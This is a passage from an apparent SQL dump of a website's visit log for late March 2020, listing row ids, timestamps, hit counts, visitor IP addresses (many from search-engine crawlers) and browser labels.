hrome'),(491081,1584965901,1,1,0,0,'49.87.226.7','chrome'),(491082,1584966047,1,0,1,0,'157.55.39.22',''),(491083,1584966051,1,1,0,0,'182.247.61.168','chrome'),(491084,1584966053,1,1,0,0,'113.110.29.198','chrome'),(491085,1584966223,1,1,0,0,'173.252.95.29','other'),(491086,1584966343,1,1,0,0,'17.58.101.25','other'),(491087,1584966882,1,1,0,0,'66.249.64.30','chrome'),(491088,1584967990,1,1,0,0,'157.55.39.22','other'),(491089,1584968113,1,1,0,0,'66.249.70.38','chrome'),(491090,1584968523,1,1,0,0,'91.196.179.25','chrome'),(491091,1584968991,1,1,0,0,'66.249.64.1','chrome'),(491092,1584969269,1,0,1,0,'157.55.39.22',''),(491093,1584969364,1,1,0,0,'185.39.197.101','chrome'),(491094,1584969646,1,1,0,0,'207.46.13.213','other'),(491095,1584969674,1,1,0,0,'157.55.39.222','other'),(491096,1584969810,1,1,0,0,'213.180.203.29','other'),(491097,1584970181,1,0,1,0,'157.55.39.22',''),(491098,1584970661,1,1,0,0,'207.46.13.150','other'),(491099,1584970902,1,1,0,0,'116.22.2.22','chrome'),(491100,1584970912,1,1,0,0,'122.188.242.39','chrome'),(491101,1584971450,1,1,0,0,'8.29.198.27','other'),(491102,1584971473,1,1,0,0,'207.46.13.213','other'),(491103,1584972066,1,1,0,0,'157.55.39.222','other'),(491104,1584972126,1,1,0,0,'66.249.64.30','chrome'),(491105,1584972174,1,1,0,0,'8.29.198.25','other'),(491106,1584972220,1,1,0,0,'91.196.178.170','chrome'),(491107,1584972621,1,1,0,0,'157.55.39.22','other'),(491108,1584973167,1,1,0,0,'112.113.153.208','chrome'),(491109,1584974217,1,1,0,0,'207.46.13.213','other'),(491110,1584974731,1,1,0,0,'66.249.64.31','chrome'),(491111,1584974871,2,2,0,0,'60.191.38.77','firefox'),(491112,1584974952,1,1,0,0,'64.225.62.112','chrome'),(491113,1584975043,1,1,0,0,'66.249.70.38','chrome'),(491114,1584975527,1,1,0,0,'178.154.200.33','other'),(491115,1584975610,1,0,1,0,'207.46.13.150',''),(491116,1584975921,1,1,0,0,'66.249.64.1','chrome'),(491117,1584977348,1,1,0,0,'87.148.38.167','firefox'),(491118,1584977670,1,1,0,0,'66.249.64.30','chrome'),(491119,1584977929,2,2,0,0,'66.249.64.1','chrome'),(491120,1584979034,1,1,0,0,'222.92.189.14','chrome'),(491121,1584979272,1,1,0,0,'207.46.13.213','other'),(491122,1584979514,1,1,0,0,'146.120.244.2','other'),(491123,1584979710,1,1,0,0,'66.249.64.30','chrome'),(491124,1584979927,1,1,0,0,'213.180.203.29','other'),(491125,1584980162,1,1,0,0,'66.249.64.31','chrome'),(491126,1584980194,1,1,0,0,'66.249.70.33','chrome'),(491127,1584980631,1,1,0,0,'66.249.64.30','chrome'),(491128,1584980729,1,1,0,0,'66.249.70.38','chrome'),(491129,1584982085,2,2,0,0,'66.249.64.30','chrome'),(491130,1584982177,1,1,0,0,'157.55.39.22','other'),(491131,1584982240,1,1,0,0,'91.196.178.16','chrome'),(491132,1584982284,1,1,0,0,'8.29.198.27','other'),(491133,1584982294,1,1,0,0,'66.249.64.31','chrome'),(491134,1584982717,1,1,0,0,'2.47.39.210','other'),(491135,1584983018,1,1,0,0,'8.29.198.26','other'),(491136,1584984371,1,1,0,0,'66.249.64.30','chrome'),(491137,1584984387,2,2,0,0,'157.55.39.22','other'),(491138,1584984517,1,0,1,0,'157.55.39.222',''),(491139,1584985611,1,1,0,0,'111.163.140.56','chrome'),(491140,1584985635,1,1,0,0,'114.237.209.150','chrome'),(491141,1584985637,1,1,0,0,'114.103.19.10','chrome'),(491142,1584985859,1,1,0,0,'178.154.200.20','other'),(491143,1584986024,1,1,0,0,'112.237.160.102','chrome'),(491144,1584986304,1,1,0,0,'151.106.11.190','chrome'),(491145,1584986898,1,1,0,0,'213.180.203.11','other'),(491146,1584988130,1,1,0,0,'213.180.203.11','other'),(491147,1584988480,1,1,0,0,'157.55.39.222','other'),(491148,1584988803,2,2,0,0,'213.180.203.186','other'),(491149,1584988985,21,21,0,0,'93.90.195.172','firefox'),(491150,1584989321,1,1,0,0,'173.252.111.2','other'),(491151,1584989322,1,1,0,0,'173.252.111.7','other'),(491152,1584989393,2,2,0,0,'173.252.111.14','other'),(491153,1584989394,1,1,0,0,'173.252.111.6','other'),(491156,1584989395,1,1,0,0,'173.252.111.24','other'),(491157,1584989430,1,1,0,0,'66.249.70.38','chrome'),(491158,1584989988,1,1,0,0,'213.180.203.186','other'),(491159,1584990478,1,1,0,0,'157.55.39.22','other'),(491160,1584990827,1,1,0,0,'213.180.203.186','chrome'),(491161,1584991464,2,2,0,0,'213.180.203.186','other'),(491162,1584991601,1,1,0,0,'213.180.203.10','other'),(491163,1584992073,1,1,0,0,'157.55.39.222','other'),(491164,1584992417,3,3,0,0,'213.180.203.186','other'),(491165,1584993033,1,0,1,0,'66.249.64.23',''),(491166,1584993034,1,1,0,0,'66.249.64.23','chrome'),(491167,1584993105,2,2,0,0,'8.29.198.27','other'),(491168,1584993143,1,1,0,0,'157.55.39.222','other'),(491169,1584994402,1,1,0,0,'213.180.203.186','other'),(491170,1584994404,1,1,0,0,'115.148.43.99','chrome'),(491171,1584994893,2,1,1,0,'157.55.39.22',''),(491172,1584995197,1,1,0,0,'173.252.111.15','other'),(491173,1584995435,2,2,0,0,'95.213.141.126','opera'),(491174,1584995500,1,1,0,0,'91.196.178.16','chrome'),(491175,1584995956,1,1,0,0,'66.249.64.23','chrome'),(491176,1584996244,1,1,0,0,'213.180.203.11','other'),(491177,1584996308,2,2,0,0,'213.180.203.186','other'),(491178,1584996609,1,1,0,0,'66.249.64.25','chrome'),(491179,1584997824,1,1,0,0,'66.249.64.24','chrome'),(491180,1584997965,2,2,0,0,'213.180.203.186','other'),(491181,1584998296,2,1,1,0,'66.249.64.25',''),(491182,1584998411,3,3,0,0,'207.46.13.76','other'),(491183,1584998653,1,1,0,0,'178.154.200.20','other'),(491184,1585000604,1,1,0,0,'157.55.39.22','other'),(491185,1585000952,3,3,0,0,'207.46.13.197','other'),(491186,1585001115,1,1,0,0,'178.154.200.77','other'),(491187,1585001233,1,1,0,0,'213.180.203.29','other'),(491188,1585001521,1,1,0,0,'207.46.13.76','other'),(491189,1585001765,1,1,0,0,'213.180.203.158','other'),(491190,1585002111,1,1,0,0,'213.180.203.22','other'),(491191,1585002309,1,1,0,0,'114.237.57.254','chrome'),(491192,1585002625,1,1,0,0,'213.180.203.187','other'),(491193,1585002718,1,1,0,0,'207.46.13.197','other'),(491194,1585002842,1,1,0,0,'213.180.203.186','other'),(491195,1585002969,1,1,0,0,'59.52.250.71','chrome'),(491196,1585003541,1,1,0,0,'66.249.64.25','chrome'),(491197,1585003672,1,1,0,0,'207.46.13.197','other'),(491198,1585003837,2,2,0,0,'66.249.64.24','chrome'),(491199,1585003926,1,1,0,0,'8.29.198.26','other'),(491200,1585003954,1,1,0,0,'178.154.200.2','other'),(491201,1585004002,1,1,0,0,'66.249.64.23','chrome'),(491202,1585004040,1,1,0,0,'213.180.203.10','other'),(491203,1585004114,1,0,1,0,'157.55.39.22',''),(491204,1585004593,1,1,0,0,'213.180.203.186','other'),(491205,1585004684,1,1,0,0,'8.29.198.27','other'),(491206,1585004870,8,8,0,0,'138.201.133.205','chrome'),(491207,1585004916,1,1,0,0,'114.238.85.167','chrome'),(491208,1585005178,1,1,0,0,'66.249.64.24','chrome'),(491209,1585005185,2,2,0,0,'66.249.64.25','chrome'),(491210,1585005311,1,1,0,0,'157.55.39.22','other'),(491211,1585005732,1,1,0,0,'178.154.200.12','other'),(491212,1585006498,2,2,0,0,'207.46.13.76','other'),(491213,1585006978,1,1,0,0,'110.86.119.31','chrome'),(491214,1585007820,2,2,0,0,'213.180.203.186','other'),(491215,1585008004,1,1,0,0,'66.249.64.23','chrome'),(491216,1585008169,1,1,0,0,'180.130.236.104','chrome'),(491217,1585008185,1,1,0,0,'60.188.120.1','chrome'),(491218,1585008573,1,1,0,0,'180.104.85.186','chrome'),(491219,1585008576,1,1,0,0,'207.46.13.76','other'),(491220,1585008732,1,1,0,0,'66.249.64.25','chrome'),(491221,1585008858,2,2,0,0,'213.180.203.186','other'),(491222,1585009067,1,1,0,0,'66.249.70.33','chrome'),(491223,1585009071,2,2,0,0,'213.180.203.158','other'),(491224,1585009562,1,1,0,0,'66.249.64.23','chrome'),(491225,1585009682,1,1,0,0,'213.180.203.55','other'),(491226,1585009698,1,1,0,0,'51.91.218.49','other'),(491227,1585009796,1,1,0,0,'66.249.64.24','chrome'),(491228,1585009991,1,1,0,0,'213.180.203.145','other'),(491229,1585010126,1,1,0,0,'213.180.203.66','other'),(491230,1585010128,1,1,0,0,'178.154.200.34','other'),(491231,1585010193,1,1,0,0,'157.55.39.22','other'),(491232,1585011125,3,3,0,0,'66.249.64.23','chrome'),(491233,1585011296,3,3,0,0,'66.249.64.25','chrome'),(491234,1585011306,1,1,0,0,'62.205.134.182','other'),(491235,1585011682,2,2,0,0,'66.70.160.89','msie'),(491236,1585011818,1,1,0,0,'213.180.203.186','other'),(491237,1585012064,1,1,0,0,'39.66.11.18','chrome'),(491238,1585012083,1,1,0,0,'120.84.9.102','chrome'),(491239,1585012228,1,1,0,0,'42.242.11.224','chrome'),(491240,1585012373,1,1,0,0,'66.249.64.23','chrome'),(491241,1585012783,1,1,0,0,'62.210.83.78','firefox'),(491242,1585013673,2,2,0,0,'66.249.64.24','chrome'),(491243,1585013973,1,0,1,0,'66.249.64.23',''),(491244,1585014632,1,1,0,0,'213.180.203.11','other'),(491245,1585014758,2,2,0,0,'8.29.198.26','other'),(491246,1585015389,1,1,0,0,'213.180.203.186','other'),(491247,1585015604,1,1,0,0,'131.220.6.152','chrome'),(491248,1585015606,1,1,0,0,'213.180.203.85','other'),(491249,1585015835,1,1,0,0,'213.180.203.158','other'),(491250,1585015870,1,1,0,0,'66.249.64.23','chrome'),(491251,1585015930,1,1,0,0,'213.180.203.29','other'),(491252,1585016015,2,2,0,0,'207.46.13.186','other'),(491253,1585016020,1,1,0,0,'207.46.13.206','other'),(491254,1585016037,2,0,2,0,'157.55.39.22',''),(491255,1585016260,1,1,0,0,'178.154.200.12','other'),(491256,1585016396,1,1,0,0,'207.46.13.197','other'),(491257,1585016397,1,1,0,0,'213.180.203.165','other'),(491258,1585016490,1,1,0,0,'178.154.171.134','other'),(491259,1585016491,1,1,0,0,'178.154.171.127','other'),(491260,1585016735,1,1,0,0,'213.180.203.123','other'),(491261,1585017456,2,2,0,0,'207.46.13.197','other'),(491262,1585017474,2,2,0,0,'213.180.203.73','other'),(491263,1585017904,1,1,0,0,'66.249.64.24','chrome'),(491264,1585018258,1,1,0,0,'213.180.203.11','other'),(491265,1585018341,1,1,0,0,'66.249.70.36','chrome'),(491266,1585018449,1,1,0,0,'213.180.203.29','other'),(491267,1585018452,1,1,0,0,'213.180.203.13','other'),(491268,1585018734,1,1,0,0,'213.180.203.63','other'),(491269,1585018916,2,2,0,0,'66.249.64.24','chrome'),(491270,1585019047,1,1,0,0,'213.180.203.187','other'),(491271,1585019082,1,1,0,0,'213.180.203.118','other'),(491272,1585019355,1,1,0,0,'178.154.200.12','other'),(491273,1585019538,1,1,0,0,'178.154.200.2','other'),(491274,1585019897,1,1,0,0,'183.161.7.3','chrome'),(491275,1585019906,1,1,0,0,'113.87.93.238','chrome'),(491276,1585019935,1,1,0,0,'157.55.39.22','other'),(491277,1585020194,1,1,0,0,'124.238.51.24','chrome'),(491278,1585020244,1,1,0,0,'58.22.170.247','chrome'),(491279,1585020331,1,1,0,0,'66.249.64.24','chrome'),(491280,1585020600,1,1,0,0,'60.189.96.68','chrome'),(491281,1585020847,1,1,0,0,'117.92.126.50','chrome'),(491282,1585020991,2,2,0,0,'213.180.203.118','other'),(491283,1585021306,1,1,0,0,'114.99.177.100','chrome'),(491284,1585021458,1,1,0,0,'66.249.64.25','chrome'),(491285,1585021805,1,1,0,0,'66.249.64.24','chrome'),(491286,1585021823,1,1,0,0,'66.249.64.23','chrome'),(491287,1585022159,1,1,0,0,'66.249.70.33','chrome'),(491288,1585022536,1,1,0,0,'213.180.203.11','other'),(491289,1585022983,1,1,0,0,'60.160.143.20','chrome'),(491290,1585022987,1,1,0,0,'111.72.111.229','chrome'),(491291,1585023064,1,1,0,0,'66.249.64.24','chrome'),(491292,1585023148,1,1,0,0,'66.249.70.38','chrome'),(491293,1585023166,1,1,0,0,'66.249.70.33','chrome'),(491294,1585023255,1,1,0,0,'157.55.39.22','other'),(491295,1585023386,1,1,0,0,'178.154.200.12','other'),(491296,1585023718,2,2,0,0,'66.249.64.23','chrome'),(491297,1585023770,1,1,0,0,'213.180.203.143','other'),(491298,1585023986,1,1,0,0,'207.46.13.197','other'),(491299,1585024162,1,1,0,0,'49.87.79.48','chrome'),(491300,1585024189,1,1,0,0,'222.83.142.169','chrome'),(491301,1585024192,1,1,0,0,'213.180.203.186','other'),(491302,1585024353,1,1,0,0,'112.113.154.189','chrome'),(491303,1585024706,1,1,0,0,'223.241.43.196','chrome'),(491304,1585024707,3,3,0,0,'66.249.64.24','chrome'),(491305,1585025082,1,1,0,0,'36.56.151.102','chrome'),(491306,1585025083,1,1,0,0,'60.166.87.98','chrome'),(491307,1585025252,2,2,0,0,'66.249.64.25','chrome'),(491308,1585025267,2,2,0,0,'207.46.13.197','other'),(491309,1585025330,1,1,0,0,'178.154.200.11','other'),(491310,1585025587,1,1,0,0,'8.29.198.25','other'),(491311,1585025669,1,1,0,0,'91.209.11.236','other'),(491312,1585026127,1,1,0,0,'66.249.64.23','chrome'),(491313,1585026193,2,2,0,0,'66.249.64.25','chrome'),(491314,1585026347,1,1,0,0,'8.29.198.26','other'),(491315,1585026465,1,1,0,0,'213.180.203.186','other'),(491316,1585026739,2,2,0,0,'66.249.64.24','chrome'),(491317,1585027074,1,1,0,0,'183.190.84.46','chrome'),(491318,1585027266,2,2,0,0,'157.55.39.22','other'),(491319,1585027271,2,2,0,0,'66.249.64.25','chrome'),(491320,1585027598,1,1,0,0,'213.180.203.191','other'),(491321,1585027602,1,1,0,0,'66.249.70.36','chrome'),(491322,1585027735,110,110,0,0,'18.188.14.15','firefox'),(491323,1585027748,8,8,0,0,'18.188.14.15','other'),(491324,1585027864,1,1,0,0,'157.55.39.145','other'),(491325,1585028230,1,1,0,0,'117.66.11.220','chrome'),(491326,1585028252,1,1,0,0,'122.243.143.210','chrome'),(491327,1585028482,1,1,0,0,'62.205.134.182','other'),(491328,1585028567,1,1,0,0,'66.249.64.24','chrome'),(491329,1585028642,1,0,1,0,'207.46.13.197',''),(491330,1585029286,1,1,0,0,'60.185.70.95','chrome'),(491331,1585029379,2,2,0,0,'66.249.64.23','chrome'),(491332,1585029388,1,0,1,0,'157.55.39.145',''),(491333,1585029427,1,1,0,0,'207.46.13.206','other'),(491334,1585029658,2,1,1,0,'66.249.64.25',''),(491335,1585029703,1,1,0,0,'178.154.200.27','other'),(491336,1585029772,1,1,0,0,'66.249.64.24','chrome'),(491337,1585029892,1,1,0,0,'91.211.12.74','chrome'),(491338,1585030006,1,1,0,0,'66.249.70.38','chrome'),(491339,1585030565,1,1,0,0,'157.55.39.108','other'),(491340,1585031066,1,1,0,0,'66.249.64.24','chrome'),(491341,1585031101,1,1,0,0,'91.196.179.25','chrome'),(491342,1585031749,1,1,0,0,'207.46.13.197','other'),(491343,1585031798,1,1,0,0,'31.13.127.23','other'),(491344,1585031799,1,1,0,0,'31.13.127.24','other'),(491345,1585031800,1,1,0,0,'31.13.127.6','other'),(491349,1585031806,1,1,0,0,'31.13.127.21','other'),(491352,1585031814,1,1,0,0,'31.13.127.9','other'),(491354,1585031815,1,1,0,0,'31.13.127.3','other'),(491355,1585032926,1,1,0,0,'91.209.11.236','other'),(491356,1585033532,1,1,0,0,'17.58.101.25','other'),(491357,1585033753,1,1,0,0,'36.32.44.115','chrome'),(491358,1585034077,1,1,0,0,'213.180.203.186','other'),(491359,1585034471,1,1,0,0,'213.180.203.11','other'),(491360,1585034641,1,1,0,0,'66.249.64.23','chrome'),(491361,1585034659,1,1,0,0,'157.55.39.108','other'),(491362,1585034883,1,1,0,0,'138.246.253.15','chrome'),(491363,1585035151,1,1,0,0,'66.249.70.36','chrome'),(491364,1585035510,1,1,0,0,'66.249.64.25','chrome'),(491365,1585035821,1,1,0,0,'66.249.64.24','chrome'),(491366,1585035848,1,1,0,0,'213.180.203.11','other'),(491367,1585035941,1,1,0,0,'66.249.64.23','chrome'),(491368,1585036157,1,1,0,0,'213.180.203.145','other'),(491369,1585036416,1,1,0,0,'8.29.198.25','other'),(491370,1585036617,1,1,0,0,'31.13.127.20','other'),(491371,1585036825,3,3,0,0,'207.46.13.197','other'),(491372,1585036837,1,1,0,0,'157.55.39.108','other'),(491373,1585036900,1,1,0,0,'66.249.64.23','chrome'),(491374,1585037176,1,1,0,0,'8.29.198.27','other'),(491375,1585037271,1,1,0,0,'157.55.39.145','other'),(491376,1585037338,1,1,0,0,'66.249.64.25','chrome'),(491377,1585037468,1,1,0,0,'178.159.37.88','chrome'),(491378,1585037769,1,1,0,0,'213.180.203.186','other'),(491379,1585037987,1,1,0,0,'207.46.13.197','other'),(491380,1585038045,1,1,0,0,'66.249.64.1','chrome'),(491381,1585038253,1,0,1,0,'157.55.39.145',''),(491382,1585038537,1,1,0,0,'91.196.177.46','chrome'),(491383,1585038678,1,1,0,0,'114.98.31.131','chrome'),(491384,1585038745,1,1,0,0,'114.96.25.213','chrome'),(491385,1585039239,1,1,0,0,'157.55.39.22','other'),(491386,1585039304,1,1,0,0,'66.249.64.1','chrome'),(491387,1585040185,1,1,0,0,'91.196.178.47','chrome'),(491388,1585040312,1,1,0,0,'213.180.203.55','other'),(491389,1585040414,1,1,0,0,'66.249.70.33','chrome'),(491390,1585041279,1,1,0,0,'58.212.99.167','chrome'),(491391,1585041302,1,1,0,0,'42.242.11.138','chrome'),(491392,1585041396,1,1,0,0,'66.249.64.30','chrome'),(491393,1585041618,1,1,0,0,'66.249.64.1','chrome'),(491394,1585041757,1,1,0,0,'173.252.111.12','other'),(491395,1585041911,1,1,0,0,'40.77.191.139','other'),(491396,1585041956,1,1,0,0,'66.249.64.31','chrome'),(491397,1585042107,2,2,0,0,'213.180.203.186','other'),(491398,1585042717,1,1,0,0,'66.249.64.30','chrome'),(491399,1585042835,1,1,0,0,'213.180.203.11','other'),(491400,1585043012,1,1,0,0,'66.249.64.31','chrome'),(491401,1585043244,1,1,0,0,'183.155.57.17','chrome'),(491402,1585043465,1,1,0,0,'66.249.70.38','chrome'),(491403,1585044458,1,1,0,0,'3.91.206.80','chrome'),(491404,1585044602,1,1,0,0,'117.66.230.54','chrome'),(491405,1585044924,1,1,0,0,'45.82.255.196','chrome'),(491406,1585045078,1,1,0,0,'66.249.64.31','chrome'),(491407,1585045347,1,1,0,0,'173.252.111.7','other'),(491408,1585045431,1,1,0,0,'91.196.178.165','chrome'),(491409,1585046151,2,2,0,0,'188.143.169.22','other'),(491410,1585046604,1,1,0,0,'157.55.39.145','other'),(491411,1585047015,1,1,0,0,'66.249.64.30','chrome'),(491412,1585047130,1,1,0,0,'91.196.178.161','chrome'),(491413,1585047140,2,2,0,0,'66.249.64.1','chrome'),(491414,1585047239,1,1,0,0,'8.29.198.27','other'),(491415,1585047663,1,1,0,0,'66.249.70.33','chrome'),(491416,1585048014,1,1,0,0,'8.29.198.25','other'),(491417,1585048506,2,1,1,0,'66.249.64.30',''),(491418,1585048844,1,1,0,0,'157.55.39.108','other'),(491419,1585048968,1,1,0,0,'66.249.64.30','chrome'),(491420,1585049114,3,3,0,0,'207.46.13.197','other'),(491421,1585049191,1,1,0,0,'66.102.9.167','chrome'),(491422,1585049389,1,1,0,0,'113.133.10.92','chrome'),(491423,1585049447,1,1,0,0,'175.165.231.122','chrome'),(491424,1585049644,1,1,0,0,'157.55.39.22','other'),(491425,1585050035,1,1,0,0,'180.106.96.98','chrome'),(491426,1585050525,1,1,0,0,'17.58.101.25','other'),(491427,1585050994,2,2,0,0,'207.46.13.197','other'),(491428,1585051145,2,2,0,0,'66.249.64.1','chrome'),(491429,1585051264,1,1,0,0,'66.249.70.36','chrome'),(491430,1585051411,1,1,0,0,'182.123.63.33','chrome'),(491431,1585052053,1,1,0,0,'91.196.178.161','chrome'),(491432,1585052128,1,1,0,0,'109.74.154.72','chrome'),(491433,1585052390,2,2,0,0,'157.55.39.22','other'),(491434,1585052482,3,1,2,0,'207.46.13.197',''),(491435,1585053153,1,1,0,0,'157.55.39.108','other'),(491436,1585053380,1,0,1,0,'157.55.39.145',''),(491437,1585053725,1,1,0,0,'1.180.167.129','chrome'),(491438,1585053752,1,1,0,0,'114.235.186.4','chrome'),(491439,1585054066,2,2,0,0,'66.249.70.36','chrome'),(491440,1585054076,1,1,0,0,'66.249.70.33','chrome'),(491441,1585054538,2,2,0,0,'66.249.64.30','chrome'),(491442,1585054737,1,1,0,0,'157.55.39.22','other'),(491443,1585055329,1,1,0,0,'66.249.70.36','chrome'),(491444,1585055437,1,1,0,0,'157.55.39.108','other'),(491445,1585055760,1,1,0,0,'173.252.111.19','other'),(491446,1585055766,1,1,0,0,'66.249.64.31','chrome'),(491447,1585055886,3,3,0,0,'66.249.64.30','chrome'),(491448,1585055900,1,1,0,0,'8.9.36.136','chrome'),(491449,1585055932,1,1,0,0,'173.252.111.20','other'),(491450,1585055983,1,0,1,0,'157.55.39.145',''),(491451,1585056290,1,1,0,0,'91.196.178.188','chrome'),(491452,1585056451,1,1,0,0,'95.132.35.178','chrome'),(491453,1585056458,1,1,0,0,'112.113.153.180','chrome'),(491454,1585056798,2,2,0,0,'66.249.64.1','chrome'),(491455,1585056846,1,1,0,0,'157.55.39.108','other'),(491456,1585056894,1,1,0,0,'94.23.61.181','chrome'),(491457,1585057469,1,1,0,0,'66.249.64.30','chrome'),(491458,1585057675,1,1,0,0,'39.149.43.114','chrome'),(491459,1585057689,1,1,0,0,'91.196.179.25','chrome'),(491460,1585057829,2,2,0,0,'66.249.64.1','chrome'),(491461,1585057841,1,1,0,0,'66.249.64.31','chrome'),(491462,1585058068,1,1,0,0,'8.29.198.25','other'),(491463,1585058838,1,1,0,0,'213.180.203.11','other'),(491464,1585058846,1,1,0,0,'8.29.198.26','other'),(491465,1585058848,2,2,0,0,'66.249.64.30','chrome'),(491466,1585059625,1,1,0,0,'66.249.70.36','chrome'),(491467,1585059883,1,1,0,0,'213.180.203.186','other'),(491468,1585059909,1,1,0,0,'66.249.64.31','chrome'),(491469,1585060161,1,1,0,0,'207.180.234.126','other'),(491470,1585060200,1,1,0,0,'188.163.18.120','chrome'),(491471,1585060411,1,1,0,0,'36.32.153.101','chrome'),(491472,1585060684,1,1,0,0,'157.55.39.22','other'),(491473,1585060761,1,1,0,0,'207.46.13.197','other'),(491474,1585061258,2,2,0,0,'66.249.64.30','chrome'),(491475,1585061447,1,1,0,0,'213.180.203.186','other'),(491476,1585061480,1,1,0,0,'66.249.64.31','chrome'),(491477,1585061798,2,1,1,0,'157.55.39.108',''),(491478,1585061882,1,0,1,0,'157.55.39.22',''),(491479,1585062059,1,1,0,0,'157.55.39.22','other'),(491480,1585062091,1,1,0,0,'95.168.121.84','chrome'),(491481,1585062322,1,1,0,0,'173.252.111.23','other'),(491482,1585062326,1,1,0,0,'207.180.234.126','other'),(491483,1585062571,1,1,0,0,'66.249.64.30','chrome'),(491484,1585062605,1,1,0,0,'182.137.53.115','chrome'),(491485,1585062878,1,1,0,0,'91.196.178.188','chrome'),(491486,1585062920,1,1,0,0,'213.180.203.11','other'),(491487,1585062930,3,3,0,0,'66.249.64.31','chrome'),(491488,1585063216,1,1,0,0,'157.55.39.108','other'),(491489,1585063268,1,1,0,0,'157.55.39.145','other'),(491490,1585063340,1,1,0,0,'91.209.11.236','other'),(491491,1585063368,2,2,0,0,'66.249.64.1','chrome'),(491492,1585063976,1,1,0,0,'131.220.6.152','chrome'),(491493,1585064387,2,2,0,0,'66.249.64.1','chrome'),(491494,1585064405,2,2,0,0,'66.249.64.30','chrome'),(491495,1585064706,1,1,0,0,'64.225.62.112','chrome'),(491496,1585065047,1,1,0,0,'180.125.97.172','chrome'),(491497,1585065048,1,1,0,0,'180.164.58.152','chrome'),(491498,1585065514,2,2,0,0,'66.249.64.31','chrome'),(491499,1585065690,1,1,0,0,'112.81.213.219','chrome'),(491500,1585065962,1,1,0,0,'91.196.178.68','chrome'),(491501,1585065975,1,1,0,0,'157.55.39.145','other'),(491502,1585066276,2,2,0,0,'66.249.64.1','chrome'),(491503,1585066351,1,1,0,0,'120.3.11.60','chrome'),(491504,1585066375,1,1,0,0,'112.47.98.82','chrome'),(491505,1585066587,1,1,0,0,'66.249.64.30','chrome'),(491506,1585066840,1,1,0,0,'60.185.66.23','chrome'),(491507,1585066917,1,1,0,0,'66.249.70.36','chrome'),(491508,1585067079,1,1,0,0,'66.249.64.31','chrome'),(491509,1585067112,2,2,0,0,'207.46.13.197','other'),(491510,1585067230,3,3,0,0,'157.55.39.145','other'),(491511,1585067552,2,2,0,0,'91.209.11.236','other'),(491512,1585067624,1,1,0,0,'116.10.60.4','chrome'),(491513,1585067829,1,1,0,0,'8.9.36.136','chrome'),(491514,1585068548,2,2,0,0,'66.249.64.31','chrome'),(491515,1585068895,1,1,0,0,'8.29.198.26','other'),(491516,1585069075,1,1,0,0,'66.249.70.33','chrome'),(491517,1585069162,2,0,2,0,'157.55.39.22',''),(491518,1585069213,1,1,0,0,'66.249.64.30','chrome'),(491519,1585069680,1,1,0,0,'8.29.198.25','other'),(491520,1585069719,1,1,0,0,'124.64.19.160','chrome'),(491521,1585069947,1,1,0,0,'116.16.18.77','chrome'),(491522,1585070280,1,1,0,0,'66.249.70.33','chrome'),(491523,1585070378,1,0,1,0,'66.249.64.31',''),(491524,1585070443,1,1,0,0,'66.249.64.1','chrome'),(491525,1585070450,1,1,0,0,'59.52.251.118','chrome'),(491526,1585070812,1,1,0,0,'157.55.39.22','other'),(491527,1585070815,1,1,0,0,'182.247.60.142','chrome'),(491528,1585070820,1,1,0,0,'175.165.229.45','chrome'),(491529,1585071264,1,1,0,0,'207.46.13.197','other'),(491530,1585071525,1,1,0,0,'157.55.39.145','other'),(491531,1585071653,1,1,0,0,'66.249.64.31','chrome'),(491532,1585071929,1,1,0,0,'66.249.64.30','chrome'),(491533,1585072240,1,0,1,0,'157.55.39.22',''),(491534,1585072379,1,1,0,0,'66.249.70.36','chrome'),(491535,1585072535,1,1,0,0,'66.249.70.33','chrome'),(491536,1585072775,1,1,0,0,'66.249.64.25','chrome'),(491537,1585073286,1,1,0,0,'91.196.178.146','firefox'),(491538,1585073553,1,0,1,0,'66.249.70.38',''),(491539,1585074021,1,1,0,0,'66.249.70.38','chrome'),(491540,1585074557,1,0,1,0,'157.55.39.22',''),(491541,1585075064,1,0,1,0,'66.249.64.24',''),(491542,1585075743,1,0,1,0,'157.55.39.22',''),(491543,1585076447,1,1,0,0,'117.90.74.71','chrome'),(491544,1585076451,1,1,0,0,'144.123.70.95','chrome'),(491545,1585076533,1,1,0,0,'66.249.64.23','chrome'),(491546,1585076678,1,1,0,0,'157.55.39.22','other'),(491547,1585077343,2,2,0,0,'66.249.64.24','chrome'),(491548,1585077661,1,1,0,0,'66.249.64.25','chrome'),(491549,1585077876,1,1,0,0,'66.249.70.36','chrome'),(491550,1585077950,1,1,0,0,'91.196.178.164','chrome'),(491551,1585078068,1,1,0,0,'114.239.199.20','chrome'),(491552,1585078111,1,1,0,0,'157.55.39.22','other'),(491553,1585079009,1,1,0,0,'66.249.64.24','chrome'),(491554,1585079027,2,2,0,0,'66.249.64.23','chrome'),(491555,1585079340,1,1,0,0,'130.204.184.227','firefox'),(491556,1585079518,1,1,0,0,'36.33.31.249','chrome'),(491557,1585079724,1,1,0,0,'8.29.198.25','other'),(491558,1585079922,1,1,0,0,'91.196.178.16','chrome'),(491559,1585079944,1,1,0,0,'66.249.64.24','chrome'),(491560,1585079955,1,1,0,0,'173.252.111.22','other'),(491561,1585080081,1,0,1,0,'66.249.64.23',''),(491562,1585080504,1,1,0,0,'8.29.198.27','other'),(491563,1585080712,1,1,0,0,'66.249.70.38','chrome'),(491564,1585080969,1,1,0,0,'66.249.64.23','chrome'),(491565,1585081337,1,1,0,0,'124.133.215.14','chrome'),(491566,1585082088,1,1,0,0,'157.55.39.22','other'),(491567,1585082179,2,2,0,0,'66.249.64.25','chrome'),(491568,1585082435,2,2,0,0,'66.249.64.23','chrome'),(491569,1585082594,1,1,0,0,'112.113.152.16','chrome'),(491570,1585082675,2,2,0,0,'66.249.70.36','chrome'),(491571,1585082865,1,1,0,0,'66.249.70.38','chrome'),(491572,1585083116,2,2,0,0,'66.249.70.33','chrome'),(491573,1585083170,2,2,0,0,'66.249.64.25','chrome'),(491574,1585083224,1,0,1,0,'207.46.13.64',''),(491575,1585083873,1,1,0,0,'138.246.253.15','chrome'),(491576,1585084172,2,2,0,0,'157.55.39.145','other'),(491577,1585084420,1,1,0,0,'213.180.203.55','other'),(491578,1585084507,1,1,0,0,'66.249.64.25','chrome'),(491579,1585084588,1,1,0,0,'213.180.203.107','other'),(491580,1585084656,1,1,0,0,'66.249.70.36','chrome'),(491581,1585084822,2,2,0,0,'66.249.64.24','chrome'),(491582,1585085028,1,1,0,0,'66.249.64.23','chrome'),(491583,1585085256,1,1,0,0,'49.89.84.246','chrome'),(491584,1585086131,1,1,0,0,'27.214.86.121','chrome'),(491585,1585086514,1,1,0,0,'213.180.203.55','other'),(491586,1585087182,1,1,0,0,'207.46.13.64','other'),(491587,1585087730,1,1,0,0,'213.180.203.52','other'),(491588,1585088517,2,2,0,0,'66.249.64.23','ch